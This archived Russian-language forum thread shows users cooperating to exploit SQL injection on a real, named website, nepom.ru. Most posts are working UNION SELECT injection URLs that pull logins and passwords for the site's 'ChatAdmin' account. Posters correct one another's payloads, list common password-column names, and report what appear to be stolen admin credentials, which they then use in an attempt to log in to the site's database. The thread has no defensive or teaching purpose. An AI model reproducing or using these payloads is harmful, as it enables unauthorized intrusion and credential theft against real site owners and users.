Просмотр полной версии : Sql иньекция в nepom.ru
Коротко и ясно уязвимость обнаружел на http://nepom.ru/users/?login=' Далее не могу понять как открыть таблицы Вродебы пишу всё правильно.
Пример http://nepom.ru/users/?login=-1%20UNION%20SELECTnull,U_Password,null,null,null%2 0FROM w3t Users WHERE U_Username='admin'/*
ИТД помогите разобраться....
А от куда ты знаешь имена таблиц?
1. У тебя неправильный синтаксис: после -1 нужно ставить ', а потом комментировать т.к. в запросе значение взято в кавычки.
2. Ты выбираешь 5 столбцов, когда там нужно всего один.
3. Нет вывода результата, поэтому посмотреть пароль не получится.
Поэтому тебе нужно искать другую sql-инъекцию :)
Если бы был вывод, правильный запрос был бы вот такой:http://nepom.ru/users/?login=-1'%20UNION%20SELECT%20passwd%20FROM%20users/*
Вот тебе настоящая sql-инъекция! :)
http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
Сейчас только логины менять ;)
http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
SQL скорее всего не получиться... т.к. он выбирает id, а id скорее всего INTEGER, а пароль VARCHAR.... скорее всего... поэтому UNION не работает... выбор идет только по одному INTEGER полю
Если вам не лень посмотрите может я ошибаюсь... Спасибо!
Вот так:
http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
!!! Когда будете вставлять, в слове "u sers" уберите пробел :)
http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
Выполняю данный запрос 1 назад всё работоло сей час что-то не работает видать нашли багу. Ктонить может обьяснить что произошло.....
багу прикрыли
а http://nepom.ru/users/?login=' еще работает
лично у меня ваще высветило что страницы full.php нету
попробуй на других страницах типа
http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27
http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27
Не выходит выполнить запрос. Что-то быстро они багу та увидали надеюсь всё мирно будет
Продолжение следует :)
http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/*
virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась:)
login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.
Вот на досуге полазал нашол следующее
Administrator
ytnvtyz
Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........
Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...
Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
Иньекцию не получается сделать никак, нет таких мозгов как virgoz[B] Помогите...
http://nepom.ru/interest/?raz='
Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен
выбор идет только по одному INTEGER полю
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot